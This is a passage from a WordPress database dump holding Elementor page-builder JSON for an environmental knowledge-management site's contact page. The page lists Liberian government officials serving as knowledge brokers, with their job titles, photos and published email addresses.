href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\n<p>Conservation Manager <\\/br> FDA <\\/br>\\n<a href=\\\"mailto:blamahg@gmail.com\\\">blamag@gmail.com<\\/a> <\\/br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23406,3402,'_elementor_edit_mode','builder'),(23407,3402,'_elementor_template_type','wp-page'),(23408,3402,'_elementor_version','3.0.16'),(23409,3402,'_wp_page_template','default'),(23410,3402,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br 